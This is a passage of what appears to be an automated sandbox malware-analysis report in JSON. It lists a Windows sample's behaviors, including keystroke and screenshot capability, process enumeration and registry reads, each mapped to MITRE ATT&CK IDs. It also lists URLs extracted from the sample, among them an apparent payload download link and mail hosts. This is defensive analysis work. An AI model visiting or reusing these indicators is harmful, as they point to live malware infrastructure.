\"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"GetForegroundWindow\" (UID: 00000000-00000892)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"rundll32.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-71", "type": 1, "relevance": 1, "name": "Contains ability to query local/system time as file time", "description": "FileTimeToLocalFileTime@KERNEL32.DLL at 00000000-00000892-16261-86-00401D40", "origin": "Hybrid Analysis Technology", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-31", "type": 1, "relevance": 1, "name": "Contains ability to retrieve/open a process", "description": "OpenProcess@KERNEL32.dll at 13525-105-00405070\n OpenProcess@KERNEL32.dll at 13525-99-004047D0\n OpenProcess@KERNEL32.dll at 13525-97-00404B90\n OpenProcess@KERNEL32.DLL at 00000000-00000892-16261-34-00405070\n OpenProcess@KERNEL32.DLL at 00000000-00000892-16261-26-00404B90\n OpenProcess@KERNEL32.DLL at 00000000-00000892-16261-28-004047D0", "origin": "Hybrid Analysis Technology", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetTempFileNameA\" (Indicator: \"GetTempFileName\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetTempFileNameA\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"GetTempFileNameA\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"base64\" (Indicator: \"base64\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n file/memory contains long string with (Indicator: \"base64\"; File: \"_.exe\")\n Found string \"base64\" (Indicator: \"base64\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found string \"moc.5432.hcraesgg\" (Indicator: \"aes\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"moc.hcraeserdracerocs\" (Indicator: \"aes\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"ten.mrofdaes.revres\" (Indicator: \"aes\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"ten.mrofdaes\" (Indicator: \"aes\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetModuleFileNameExA\" (Indicator: \"GetModuleFileName\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetModuleFileNameExA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"EnumProcessModules\" (Indicator: \"EnumProcessModules\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"EnumProcesses\" (Indicator: \"EnumProcesses\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"EnumProcessModules\" (Indicator: \"EnumProcessModules\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"EnumProcesses\" (Indicator: \"EnumProcesses\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system\\*.* (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter avicap.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter avifile.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter COMMDLG.DLL (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter keyboard.drv (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter lzexpand.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter mciavi.drv (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter mciseq.drv (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter mciwave.drv (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter MMSYSTEM.DLL (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter mmtask.tsk (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter mouse.drv (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter msvideo.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter olecli.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter OLESVR.DLL (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter rundll32.exe (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter SHELL.DLL (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter sound.drv (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter stdole.tlb (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter system.drv (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter TIMER.DRV (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter ver.dll (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter vga.drv (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"FindNextFileW\" with parameter WFWNET.DRV (UID: 00000000-00000892)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"570492902\"\n \"cx\": \"325\"\n \"cy\": \"25\"}\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1107364129\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"570493691\"\n \"cx\": \"325\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"4951119267,2092,3024,,RtlGetVersion,NTDLL.dll,\"253:12:29.882\",RX=0,PX=0\" (Indicator: \"RtlGetVersion\"; Source: \"00000000-00000892.00000000.334478.00300000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-118", "type": 2, "relevance": 1, "name": "Contains ability to query network adapter information (API string)", "description": "Found reference to API \"9470555039,1076,3177,,GetAdaptersAddresses,Iphlpapi.dll,\"253:12:33.138\",RX=0,PX=0\" (Indicator: \"GetAdaptersAddresses\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"rundll32.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: _.exe]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: notepad_.exe]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: RUNDLL32.EXE.67A47BFB.bin]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-537", "type": 2, "relevance": 1, "name": "Contains ability to create a new HTTP request (API string)", "description": "Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-228", "type": 2, "relevance": 1, "name": "Contains ability to communicate with C2 using Sockets (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")", "origin": "File/Memory", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"http://www.3721.com/adjusttime.htm\"\n Pattern match: \"http://%s/\"\n Heuristic match: \"pop3.163.com\"\n Heuristic match: \"mail.online.ie\"\n Heuristic match: \"aha01%s@online.ie\"\n Pattern match: \"http://www.mxm9191.com/myrunner_up.exe\"\n Pattern match: \"http://www.zigui.org/article.php?id=103822\"\n Pattern match: \"www.3721.com/adjusttime.htmmozilla/4.0\"\n Pattern match: \"www.zigui.org\"\n Pattern match: \"www.zigui.orgconnection\"\n Pattern match: \"www.zigui.org/article.php?id=103822\"\n Heuristic match: \"ww.zigui.org\"\n Heuristic match: \"igui.org\"\n Heuristic match: \"zigui.org\"\n Heuristic match: \"w.zigui.org\"\n Heuristic match: \"pathext=.co\"\n Heuristic match: \"e;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.ws\"\n Pattern match: \"www.southwest.com/\"\n Pattern match: \"www.cheapoair.com/\"\n Pattern match: \"www.newgrounds.com/\"\n Pattern match: \"www.instagram.com/\"\n Pattern match: \"www.rakuten.co.jp/\"\n Pattern match: \"secure-assets.rubiconproject.com/utils/xapi/\"\n Pattern match: \"www.mynet.com/\"\n Pattern match: \"www.kohls.com/\"\n Pattern match: \"www.scribd.com/\"\n Pattern match: \"ih.adscale.de/adscale-ih/\"\n Pattern match: \"www.monografias.com/\"\n Pattern match: \"www.priceline.com/\"\n Pattern match: \"www.laredoute.fr\"\n Heuristic match: \"autoscout24.de\"\n Heuristic match: \"unrulymedia.com\"\n Heuristic match: \"partycasino.com\"\n Heuristic match: \"lfstmedia.com\"\n Heuristic match: \"directadvert.ru\"\n Heuristic match: \"spotxchange.com\"\n Heuristic match: \"tiara.daum.net\"\n Pattern match: \"www.blogcu.com\"\n Heuristic match: \"tribalfusion.com\"\n Heuristic match: \"x01.aidata.io\"\n Heuristic match: \"u3s.mathtag.com\"\n Heuristic match: \"listenvid.com\"\n Heuristic match: \"buenastareas.com\"\n Heuristic match: \"px.powerlinks.com\"\n Heuristic match: \"moc.ataderusaert.ni\"\n Heuristic match: \"in.treasuredata.com\"\n Pattern match: \"www.gamesgames.com\"\n Pattern match: \"www.microsoft.com\"\n Heuristic match: \"urbandictionary.com\"\n Heuristic match: \"config.parsely.com\"\n Heuristic match: \"y.one.impact-ad.jp\"\n Pattern match: \"www.lowermybills.com\"\n Pattern match: \"www.eastmoney.com\"\n Heuristic match: \"yjtag.yahoo.co.jp\"\n Heuristic match: \"secure.calcch.com\"\n Heuristic match: \"logging.admicro.vn\"\n Pattern match: \"www.groupon.co.uk\"\n Heuristic match: \"autouk.demdex.net\"\n Pattern match: \"www.bloomberg.com\"\n Heuristic match: \"accounts.google.com\"\n Heuristic match: \"ibeu2.mookie1.com\"\n Heuristic match: \"it.altervista.org\"\n Heuristic match: \"ggsearch.2345.com\"\n Heuristic match: \"skimresources.com\"\n Pattern match: \"www.babycenter.com\"\n Pattern match: \"www.moviefone.com\"\n Heuristic match: \"rincondelvago.com\"\n Heuristic match: \"duba.com\"\n Heuristic match: \"wsj.com\"\n Heuristic match: \"gap.com\"\n Heuristic match: \"bidr.io\"\n Heuristic match: \"naver.jp\"\n Heuristic match: \"7k7k.com\"\n Heuristic match: \"ioam.de\"\n Heuristic match: \"java.com\"\n Heuristic match: \"tanx.com\"\n Heuristic match: \"songs.pk\"\n Heuristic match: \"fout.jp\"\n Heuristic match: \"2ch.net\"\n Heuristic match: \"9223.com\"\n Heuristic match: \"krxd.net\"\n Heuristic match: \"popin.cc\"\n Heuristic match: \"daum.net\"\n Heuristic match: \"yimg.com\"\n Heuristic match: \"knet.cn\"\n Heuristic match: \"xiti.com\"\n Heuristic match: \"rk.oc.tm\"\n Heuristic match: \"mt.co.kr\"\n Heuristic match: \"webs.com\"\n Heuristic match: \"etsy.com\"\n Heuristic match: \"nasa.gov\"\n Heuristic match: \"hulu.com\"\n Heuristic match: \"ikea.com\"\n Heuristic match: \"3366.com\"\n Heuristic match: \"w55c.net\"\n Heuristic match: \"moc.ae\"\n Heuristic match: \"ea.com\"\n Heuristic match: \"ning.com\"\n Heuristic match: \"wwe.com\"\n Heuristic match: \"pho.to\"\n Heuristic match: \"csdn.net\"\n Heuristic match: \"g.58.com\"\n Heuristic match: \"yoyi.com.cn\"\n Heuristic match: \"izlesene.com\"\n Heuristic match: \"trugaze.io\"\n Heuristic match: \"youku.com\"\n Heuristic match: \"ip138.com\"\n Heuristic match: \"gssprt.jp\"\n Heuristic match: \"baidu.com\"\n Heuristic match: 